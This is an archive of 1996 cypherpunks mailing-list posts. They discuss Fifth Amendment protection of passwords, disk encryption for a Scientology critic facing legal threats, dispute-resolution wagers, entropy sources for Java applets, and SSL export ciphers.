> amendment.  I'm sure a REAL LAWYER (TM) reading this note will cite the 
> first known example of a handwriting example being demanded by a court.  
> What do you want to bet that it first occurred in this century?

I have US$ 50,000 that says it didn't.  Care to take me up on it?

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 21 Apr 1996 19:47:02 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption
In-Reply-To: <199604210544.XAA09283@xmission.xmission.com>
Message-ID: <Pine.SUN.3.91.960421035428.21453D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996 mirele@xmission.com wrote:

> I have received a lot of comment about my request for OS/2
> encryption...perhaps I didn't make myself clear.

[...]

> *That's* why I inquired about disk security.  Not because I'm trying to
> hide something from Scientology...but because I don't appreciate people
> messing around with something that I've worked very hard on.

Not to get too out of hand, but how is encryption going to prevent deletions?

> Deana M. Holmes
> mirele@xmission.com
> -----BEGIN GEEK CODE BLOCK-----
> Version:  3.1
> GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
> X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
> ------END GEEK CODE BLOCK------
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 21 Apr 1996 15:21:21 +0800
To: "Deana M. Holmes" <mirele@xmission.com>
Subject: Re: OS/2 encryption utilities
Message-ID: <199604210427.VAA24493@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from mirele@xmission.com 04/20/96  2:26pm       
 
= Due to the fact that I have been threatened by the Church of Scientology 
= with legal action if I do not cease and desist posting encheferated 
= parodies of their secret scripture (per a letter I received from Cult 
= attorneys via Federal Express today) I am in search of OS/2 disk 
= encryption programs. 
=  

                                DISCLAIMER: 

    I am not a practicing attorney; I am not offering you legal advice 
in any form.  I personally would be first and foremost concerned with
all the ramifications of destroying evidence; and, testing the rules of
discovery.  In no way am I condoning any action which may be contrary to
the rules of justice in any jurisdiction.

    Keep in mind what "schwarzerPford mit gehornt" said: having asked 
for help in a public forum, the Co$ attorneys potentially will be going 
for discovery violations.
 
    That said..................
 
    The only way you are going to get automatic disk encryption with 
OS/2 is to write a driver which would need to distinguish between
drives and/or partitions as you would probably not wish to encrypt the
operating system and routine files.  

    Secondly, if you have _all_ your files encrypted, you are begging
for a contempt citation if you refuse the keys.  alternatively, you
could reverse engineer one of the disk compress programs (__.sys
drivers) and add a stream function for encryption --again begging
contempt.
 
    A better way from my perspective to preserve some of my first 
amendment rights would be to use an IOMega optical floppy (flopitcal).

    IOmega has a new 100+M byte unit for around $200 which can double as 
a standard 3.5 floppy and runs on SCSI cards like the Adaptec and
others (they may have an EIDE version).  I believe there is now a
version which is bootable.  The blank disks are under $20/100MB (quite
reasonable).  Unless you are storing an enormouse amount of data, 100MB
is a lot of space (maybe not on my OS/2 system which has 4G!).
 
    Again, if you wish to run the encryption automatically, then you are   
required to write a new driver. 
 
    Keep in mind, with a driver, you are immediately faced with the 
problem of the encrytion keys --particularly if they are embedded in the 
controller.  You could have one of the keys embedded in each floptical 
and a utility program to enter the second key, password, etc.  when the
driver started up...  however, from my perspective, you would be better
off to just convert your encrypted files to plain text to work with your
files; then re-encrypting the material when you are done.
 
    needless to say, the floptical is not very obvious...  and
confiscating your system does not give away the keys, etc.  However, 
you would be wise _not_ to involve another individual, etc.  Not only is
that a weak point, but it puts them in the loop and provides the 
government with an opportunity to include conspiracy --which carries the
same penalty as the "crime" and additional charges of obstructing 
justice.
 
    pgp is available for OS/2, obtainable from Hobbes. BTW, do NOT keep
your key ring, particularly the private key king, on the hard disks;
keep it on a *separate* floppy.  do NOT keep it on the floptical with
the encrypted material.

    we are all concerned with privacy: the first, second, fourth,  
fifth,etc. amendment rights --what little there is left of them.  However, 
regardless of any anarchistic-libertarian viewpoints, the best advice is
not to raise your head --put your helmet on the rifle butt and raise
that if you must --and, if you're riding in a helicopter, sit on your
helmet.

    revenge may be a dish best served up cold, but anonymous remailers, 
particularly the encrypting ones, (do not use penet) are wonderful 
tools for the underground publishing of unpopular political and/or 
religious beliefs.  There is a long line of court decisions which 
permit anonymous publishing --despite the fact Bubba certainly intends
to take away our rights, particularly in cyberspace.

    lastly, learn from many who have preceded you: don't stonewall the 
court --that "fool" in the black robe can ring your bell however he 
wishes with contempt citations; there is little you can do about it and 
the local jails are not Club Fed.





--
    "You're always disappointed, nothing seems to keep you high -- 
    drive your bargains, push your papers, win your medals, 
    fuck your strangers; don't it leave you on the empty side ?"  
        --Joni Mitchell, 1972


cc: Black Unicorn <unicorn@schloss.li>
    Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mirele@xmission.com
Date: Mon, 22 Apr 1996 01:11:26 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: OS/2 encryption
In-Reply-To: <Pine.SUN.3.91.960421035428.21453D-100000@polaris.mindport.net>
Message-ID: <199604211304.HAA04319@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.960421035428.21453D-100000@polaris.mindport.net>, on
04/21/96 at 03:55 AM,
   Black Unicorn <unicorn@schloss.li> said:

>On Sat, 20 Apr 1996 mirele@xmission.com wrote:

>> I have received a lot of comment about my request for OS/2
>> encryption...perhaps I didn't make myself clear.

>[...]

>> *That's* why I inquired about disk security.  Not because I'm trying to
>> hide something from Scientology...but because I don't appreciate people
>> messing around with something that I've worked very hard on.

>Not to get too out of hand, but how is encryption going to prevent
>deletions?

Well, anything to slow them down.  It was reported to me that when Dennis
Erlich was raided last year, they rendered his computer unbootable because
of the deletions they had made.  As it is, I haven't been able to find an
appropriate security utility beyond PGP (which I've been using for over a
year anyway).  So this discussion is moot.

Look folks.  *This* is what it's about.  I like a little humour.  So what
I've been doing is taking *posted* documents and running them through a
filter (the "encheferizer" of alt.swedish.chef.bork.bork.bork) and then
reposting them to alt.religion.scientology.  I have been doing this for
over a year.  It's only been recently that (a) the Church <spit> started
cancelling them and (b) that they started threatening me over it.  

And then the humourless gits of the Church <spit> went to the trouble to
get an attorney in New York City to threaten me.  I'm taking the threat
very seriously.  This (looking for more secure ways to keep my computer
from being trashed) is part of it.  

(If people would like to read the letter I received from the Church
<spit>, either read alt.religion.scientology, where it has been posted, or email me and I will send you a copy.)

Deana M. Holmes
mirele@xmission.com
-----BEGIN GEEK CODE BLOCK-----
Version:  3.1
GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Apr 1996 03:12:53 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [Yadda Yadda Yadda] Re: 5th protect password?
In-Reply-To: <Pine.SUN.3.91.960421034850.21453C-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.960421084606.11213A-100000@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> On Sat, 20 Apr 1996, jim bell wrote:
> 
> > amendment.  I'm sure a REAL LAWYER (TM) reading this note will cite the 
> > first known example of a handwriting example being demanded by a court.  
> > What do you want to bet that it first occurred in this century?

To which Black Unicorn responded: 

> I have US$ 50,000 that says it didn't.  Care to take me up on it?

Though I think the wager offered way out of line, I wish that 
this mechanism for handling disputes were used more often on the
Cypherpunk list.  It's easy for folks to shoot their mouths off 
when they can do so at virtually zero cost.  The results are 
endless flame wars with only rare resolution.  When money is at 
stake, there is an incentive to be more temperant in ones claims.

I would be interested to see if Jim Bell and Black Unicorn could
engage in a "friendly" wager on the question in point for the
nominal sum of, say, US$100.  Perhaps they can cooperate to frame
their dispute in unambiguous terms, mutually agree upon an escrow
agent and pick a referee or other resolution mechanism to decide 
their "case."  Wouldn't that be something?

By the way, gentlemen, I'm not kidding.  Everyone on this list
could use a respite from all the "yes-it-is-no-it's-not" posts
among various combatants engaged in "how-many-angels..." spats.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 22 Apr 1996 04:49:02 +0800
To: Sandy Sandfort <unicorn@schloss.li>
Subject: Re: [Yadda Yadda Yadda] Re: 5th protect password?
Message-ID: <199604211716.KAA08249@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>To which Black Unicorn responded: 
>
>> I have US$ 50,000 that says it didn't.  Care to take me up on it?

At 09:07 AM 4/21/96 -0700, Sandy Sandfort wrote:
> Though I think the wager offered way out of line, I wish that 
> this mechanism for handling disputes were used more often on the
> Cypherpunk list.  It's easy for folks to shoot their mouths off 
> when they can do so at virtually zero cost.  The results are 
> endless flame wars with only rare resolution.  When money is at 
> stake, there is an incentive to be more temperant in ones claims.

This mechanism was tried extensively on the extropians list, and
in my judgement it was totally unsuccessful.

When money is at stake, flames concerning ill considered factual 
claims are replaced by power moves to manipulate the system,
obtain corrupt adjudicators, and intimidate, exclude and silence 
dispute in order to win, or conceal evasion of, ill considered bets.


> I would be interested to see if Jim Bell and Black Unicorn could
> engage in a "friendly" wager on the question in point for the
> nominal sum of, say, US$100.  Perhaps they can cooperate to frame
> their dispute in unambiguous terms, mutually agree upon an escrow
> agent and pick a referee or other resolution mechanism to decide 
> their "case."  Wouldn't that be something?

This would work at $100.  But the temptation is always
to escalate the bet, to win by bluffing, with the result that
the dispute is escalated, rather than resolved.

At $500, our problem would become much worse, rather than much
better.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 22 Apr 1996 05:11:44 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: 5th protect password?
Message-ID: <m0uB2v1-00090gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 PM 4/20/96 -0700, Steve Reid wrote:
>> >   A defendant can be compelled to produce material evidence that
>> >   is incriminating.  Fingerprints, blood samples, voice
>> >   exemplars, handwriting specimens, or other items of physical
>> >   evidence may be extracted from a defendant against his will.
>
>> As you might expect, I see a problem (and a pattern!) with even these 
>> examples.  Notice that with the possible exception of "handwriting 
>> specimens", the examples above all represent pieces of evidence whose 
>> utility was only made technologically possible by developments done more 
>> than a century after the writing of the Constitution.  Fingerprints have 
>
>I think you missed the main pattern... When a suspect is required to
>provide fingerprints, voice, blood and/or handwriting samples, those
>things are used exclusively for _identification_.

Is this "a distinction without a difference"???  

>
>The only exceptions I can think of are when blood, breath and urine
>samples are taken from a suspect to detect certain chemicials in the body. 
>But, AFAIK, those exceptions are entirely the product of the recent war on
>drugs. 

This is odd.  By mentioning those exceptions you just destroyed your 
argument.  If you were trying to claim that "identification"-intended 
evidence was not protected by the 5th amendment, mentioning samples taken to 
detect drugs are obviously not of this type.  The implication is that they 
represent an entirely different class of "non-violations" of the 5th 
amendment.  How many other non-violations are you going to be able to pull 
out of that hat, along with that rabbit?

This, as you might expect, is getting hilarious.  Somehow, I think 
everything that might be construed as a violation of the 5th is going to be 
called "a special case" or "an exception" by those who see no problem, or at 
least those who 
are not willing to admit to a problem. 

What's so hard about admitting that the powers-that-be in this country today 
chafe at the protections guaranteed in the Bill of Rights, and try to do 
everything in their power to minimize or eliminate them?  It's certainly not 
an unexpected possibility, and in fact most people probably recognize that 
it is unavoidable.  Once you are dragged, kicking and screaming, to an 
admission that this kind of thing actually happens, your next task is to 
identify current policy practices which are the product of this kind of 
misinterpretation.


See, my argument is that there is a pattern of violation of the 5th 
amendment, and glory be, you provide yet more ammunition for my claims.  I 
think you need to go back, try to figure out the originally intended meaning 
of the 5th, and differentiate it from the subsequent 210+ years of wishful 
thinking on the part of the government.  

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Apr 1996 05:11:06 +0800
To: jamesd@echeque.com
Subject: Re: [Yadda Yadda Yadda] Re: 5th protect password?
In-Reply-To: <199604211716.KAA08249@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.91.960421102257.29838A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 21 Apr 1996 jamesd@echeque.com wrote:

> This mechanism was tried extensively on the extropians list, and
> in my judgement it was totally unsuccessful.

This is not extropians.  We are more anarchic, less ideological
and more goal oriented.
 
> When money is at stake, flames concerning ill considered factual 
> claims are replaced by power moves to manipulate the system,
> obtain corrupt adjudicators, and intimidate, exclude and silence 
> dispute in order to win, or conceal evasion of, ill considered bets.

And you like endless cross-talking better?  In any event, the
problems you mentioned primarily impact the combatants and are
(in my opinion) easily structured out of the system.
  
> This would work at $100.  But the temptation is always
> to escalate the bet, to win by bluffing, with the result that
> the dispute is escalated, rather than resolved.

Again, compare it to the current "solution."
 
> At $500, our problem would become much worse, rather than much
> better.

Here we agree, 100%.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 22 Apr 1996 01:05:35 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption
In-Reply-To: <199604211304.HAA04319@xmission.xmission.com>
Message-ID: <ElSYVzC00YUv431dQA@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 21-Apr-96 Re: OS/2 encryption by
mirele@xmission.com 
> (If people would like to read the letter I received from the Church
> <spit>, either read alt.religion.scientology, where it has been
posted, or ema
> il me and I will send you a copy.)


I have excerpts from the letter and some other background on the recent
Sciento threats at:

          http://fight-censorship.dementia.org/fight-censorship/dl?thread
          =Scientology's+legal+fishing+expedition,+expanded+enemies+list&
          after=2259

But for more detailed treatment, Ron Newman's web page is the place to look:

          http://kalypso.cybercom.net/~rnewman/scientology/home.html

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 22 Apr 1996 05:28:29 +0800
To: cypherpunks@toad.com
Subject: Re: OS/2 encryption
Message-ID: <2.2.32.19960421174602.0068fcfc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:53 AM 4/21/96, you wrote:
>In <Pine.SUN.3.91.960421035428.21453D-100000@polaris.mindport.net>, on
>04/21/96 at 03:55 AM,
>   Black Unicorn <unicorn@schloss.li> said:
>
>>On Sat, 20 Apr 1996 mirele@xmission.com wrote:
>
>>> I have received a lot of comment about my request for OS/2
>>> encryption...perhaps I didn't make myself clear.
>
>>[...]
>
>>> *That's* why I inquired about disk security.  Not because I'm trying to
>>> hide something from Scientology...but because I don't appreciate people
>>> messing around with something that I've worked very hard on.
>
>>Not to get too out of hand, but how is encryption going to prevent
>>deletions?
>
>Well, anything to slow them down.  It was reported to me that when Dennis
>Erlich was raided last year, they rendered his computer unbootable because
>of the deletions they had made.  As it is, I haven't been able to find an
>appropriate security utility beyond PGP (which I've been using for over a
>year anyway).  So this discussion is moot.
[snip]

I really don't understand this whole thread.  Deana wants an encryption
utility to keep her data from prying eyes.  Simple.  The cypherpunks list is
the last place I'd expect to see people question her judgment about it.

Encryption will prevent someone from reading Deana's email and other private
documents without a court ordering her to divulge her key.  Despite whatever
inference a court may draw from her encrypting data, it's a smart move,
IMHO, when you consider that the "Church" has raided 4 people's homes with
ex parte writs of seizure and hauled off their entire computer systems
(people who received letters from the "Church" not very different than the
one Deana got).  When the computers were seized they weren't taken to the
court -- they went straight to the offices of the "Church's" lawyers, where
paid experts executed extremely broad searches on the hard drives.

If you can picture your worst enemy poring through your hard drive, file by
file, you'll understand why something like secure drive or SFS would come in
handy.

Encryption may prevent deletions -- if I remember right, it was alleged that
the "Church" had selectively deleted files from one of the hard drives (I
think it was Arnie Lerma's).  If everything's encrypted, selective deletions
based on content would be impossible.  OTOH, Steve Fishman, author of the
famous Fishman Affidavit, alleges that people working for CoS came into his
house under false pretenses and deleted the contents of his entire c:\ drive.  

As for the free legal advice, Deana's very legal savvy (IMHO, based on my
time on a.r.s.), so I think we can spare it.  She's surely weighed the
consequences of what she's doing.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 22 Apr 1996 06:03:01 +0800
To: Alex Strasheim <alex@crawfish.suba.com>
Subject: Re: Add-in encryption module to Netscape
Message-ID: <199604211814.LAA07390@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I beleive the distilled wisdom on entropy availability is summed up by Wei
Dai's post.  On Sat, 20 Apr 1996 17:21 -0700 Wei Dai <weidai@eskimo.com>
said:

>It appears that a consensus has been established on cypherpunks regarding
                                            he meant coderpunks [bf]
>entropy estimation.  Hal summarized it nicely:
>
>> The first is whether this mysterious black box, the entropy estimator,
>> is really possible.  In practice the only way to know how much entropy
>> you've gotten is to have a model for how the data is being generated,
>> and to deduce from that an estimate of the entropy rate.  So the entropy
>> estimator can't be a general-purpose calcluation, but it must be one
>> which is specifically chosen, developed and tuned for the specific source
>> of entropy you are dealing with.
>
>I believe this whole thread about randomness and entropy started with the
>search for a portable software RNG and the discussion of how to estimate
>the entropy of spinners.  If we accept the above paragraph, then we have
>to reject spinners as a candidate for such a RNG, for two reasons.  First,
>we have no model of how spinners generate randomness, so we can't estimate
>their entropy.  Second, even if we developed such a model for a particular
>spinner on a particular OS, the model itself would not be portable because
>it would likely rely on nonportable assumptions about the OS.
>
>Do we have other candidates for portable software RNGs?


At 11:38 AM 4/21/96 -0500, Alex Strasheim wrote:
>Bill Frantz said:
>> I have thought about the sources of entropy available to a Java applet, and
>> there aren't many.  You should design your protocol so entropy is not
>> needed on the applet side.  Entropy is normally used to pick symmetric
>> encryption keys, and Initialization vectors
...
>Is it feasible to make an input package that stores up entropy from
>keyboard and mouse events as an applet is used?  Then when entropy is
>needed, whatever's available is used.  If there's not enough a scribble
>window or text field could pop up and the user could generate the rest. 
>(This isn't my idea, I'm inferring it from something Hal wrote.)

I don't think there is a way to get "normal" keyboard/mouse data.  A
"scribble" window is certainly a possibility.  However, see my comments
below.


>And over the long run, what, if anything, could Sun do to let applets have
>access to more entropy in Java?  Would it be practical to have an entropy
>source in the api, that could be combined with other sources in the 
>applet?


Bill Sommerfeld <sommerfeld@apollo.hp.com> posted to coderpunks:

>Subject: Entropy overestimation in Ted Ts'o's /dev/random driver
>Date: Thu, 18 Apr 1996 17:24:39 -0400
>
>I just played around a bit with Ted's /dev/random driver a bit more..
>
>It appears that the add_timer_randomness() function may overestimate
>the amount of entropy in a sequence of timestamps by a factor of five
>or more.  It attempts to keep track of first- and second-order deltas
>in order to avoid overestimating the amount of entropy added; however,
>it seems like this may not be enough.
>
>Adding a third-order delta, and doing the 2nd and 3rd-order deltas on
>the absolute value of the lower deltas seems to make things better..

Note that what Ted is using and Bill Sommerfeld is commenting on is
basically a spinner.  In looking over the detailed data (which I have not
copied), it appears to me that even adding the 3rd order deltas may leave
the actual entropy overestimated.  The source of entropy is basically the
system scheduler.  It is a deterministic process, which depends slightly on
the somewhat less deterministic processes of I/O interrupts etc.  I feel
uncomfortable estimating 1 bit/second from it, and prefer to accept Wai
Dai's zero bits/second.

One severe problem we seem to have is that all automatic entropy estimation
techniques tend to over-estimate the amount of entropy present.

Perhaps when the millennium comes, we will have hardware generation and be
able to sleep at night.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 22 Apr 1996 05:37:25 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: [NOISE] Re: DC gossip on Mike Nelson
Message-ID: <2.2.32.19960421181938.00aa6a00@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:14 PM 4/21/96 -0400, Declan B. McCullagh wrote:
>Just heard from a reliable source: Mike Nelson of the White House Office
>of Science and Technology Policy has moved on from the position of
>civilian co-chair of the Interagency Key Escrow Alternatives committee
>(I think I got that right) and will be replaced by Bruce McConnell,
>deputy to Sally Katzen at OMB/OIRA.

But what will happen to Crow and Tom Servo? ];>

It does explain alot about Government policy towards Cryptography though...
---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Mon, 22 Apr 1996 00:03:10 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: Netscape Export + 128bits SSL (?)
Message-ID: <01BB2F9B.1F300E20@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

We are very curious about security + standard + on the shelf products, because so the market will use more naturally the cryptography.

Do you know if it's possible to use Netscape client (export = 40bits RC4) on an external SSL layer (i.e., with full encryption, RC4 long keys or IDEA)?
Use extra-US implantation (SSL-Leavy or AppacheSSL, etc.) the IDEA option?
It seems that IDEA is no longer supported by SSL 3 (in the cipher suite we see IDEA with RSA but not with D-H).
Are rumors on additional algorithms (e.g., Safer SK128, Blowfish, etc.)?

On the S-HTTP side, are some non-US implantation (browser or server) available or some US-freeware that is smuggled out?

Thanks for your answers.
Jean-Paul

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet, Communication, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Apr 1996 05:16:12 +0800
To: cypherpunks@toad.com
Subject: Betting on the Unibells
Message-ID: <ad9fc23a06021004bd86@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:07 PM 4/21/96, Sandy Sandfort wrote:

>To which Black Unicorn responded:
>
>> I have US$ 50,000 that says it didn't.  Care to take me up on it?
>
>Though I think the wager offered way out of line, I wish that
>this mechanism for handling disputes were used more often on the
>Cypherpunk list.  It's easy for folks to shoot their mouths off
>when they can do so at virtually zero cost.  The results are
>endless flame wars with only rare resolution.  When money is at
>stake, there is an incentive to be more temperant in ones claims.

I believe Sandy was on the Extropians list at the same time I was (and
maybe after I left), and must recall that this was tried. The Extropians
tried several of these "market-based dispute resolution" schemes, including
wagers on debates.

In my view, all failed. Wagers and bets consumed far more list time to
discuss, argue about, and (sometimes) resolve than the experiment was
worth. Basically, not too surprising, as the actual stakes were quite low
and the real-world consequences small. "Wiggle room" was always argued for,
and "mediators" or "arbitrators" to decide the winner were hard to find for
many of the bets.

And many of the bets were poorly-formulated, at least in terms of having a
neutral third party decide the outcome.

(I don't doubt that better formulations are possible....it just requires a
lot of work, and the stakes need to be worthwhile. Mediators have to get a
big enough cut of the action to make it worthwhile for them to get
involved. It takes motivation and effort to get inolved, and I can't see
anyone with an IQ over 120--a slacker on this list--wanting to get involved
in the "yadda-yadda-yadda" debate between the Unibells.)

>I would be interested to see if Jim Bell and Black Unicorn could
>engage in a "friendly" wager on the question in point for the
>nominal sum of, say, US$100.  Perhaps they can cooperate to frame
>their dispute in unambiguous terms, mutually agree upon an escrow
>agent and pick a referee or other resolution mechanism to decide
>their "case."  Wouldn't that be something?
>
>By the way, gentlemen, I'm not kidding.  Everyone on this list
>could use a respite from all the "yes-it-is-no-it's-not" posts
>among various combatants engaged in "how-many-angels..." spats.


I find it much easier to just let Jim Bell and Black Unicorn rant at each
other. I delete their rants and insults. I figure if this keeps them
occupied for hours every night, to each their own.

--Tim May

(Speaking of the Unibells...did you hear about the bomber who blows up his
victims and then eats the pieces? The Unadahmer.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@crawfish.suba.com>
Date: Mon, 22 Apr 1996 04:02:22 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Add-in encryption module to Netscape
In-Reply-To: <199604210453.VAA01630@netcom9.netcom.com>
Message-ID: <199604211638.LAA00274@crawfish.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> I have thought about the sources of entropy available to a Java applet, and
> there aren't many.  You should design your protocol so entropy is not
> needed on the applet side.  Entropy is normally used to pick symmetric
> encryption keys, and Initialization vectors

This is a reasonable approach if you're just going to send information 
from the applet to the server, which is what we were talking about.  But 
if we want to use java applets for secure two way communications, aren't 
we going to need to find some entropy somewhere?

Is it feasible to make an input package that stores up entropy from
keyboard and mouse events as an applet is used?  Then when entropy is
needed, whatever's available is used.  If there's not enough a scribble
window or text field could pop up and the user could generate the rest. 
(This isn't my idea, I'm inferring it from something Hal wrote.)

And over the long run, what, if anything, could Sun do to let applets have
access to more entropy in Java?  Would it be practical to have an entropy
source in the api, that could be combined with other sources in the 
applet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 22 Apr 1996 04:41:03 +0800
To: cypherpunks@toad.com
Subject: DC gossip on Mike Nelson
Message-ID: <glSanqK00YUv44g5ha@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just heard from a reliable source: Mike Nelson of the White House Office
of Science and Technology Policy has moved on from the position of
civilian co-chair of the Interagency Key Escrow Alternatives committee
(I think I got that right) and will be replaced by Bruce McConnell,
deputy to Sally Katzen at OMB/OIRA.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Mon, 22 Apr 1996 05:48:15 +0800
To: cypherpunks@toad.com
Subject: (Privacy) Stop unwanted email
Message-ID: <9604211749.AA13551@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: 'reagle@ATHENA.MIT.EDU'" <reagle@MIT.EDU>
>To: "Jack M. Spiegel" <mobius@llv.com>"
>Subject: Stop unwanted email
>Date: Sat, 20 Apr 1996 20:47:45 -0700
>Encoding: 43 TEXT
>
>4-20-96  9321
>
>Hi  reagle@ATHENA.MIT.EDU:
>
>Your name was on a list that I bought. It was advertised as a "clean list" 
>of people who do not object to getting junk email. After sending a few 
>hundred, I realized the list was not "clean" and decided to create a place 
>on the net where people can register not to get junk email. In the future, 
>I will offer to clean other lists that other commercial mailers are 
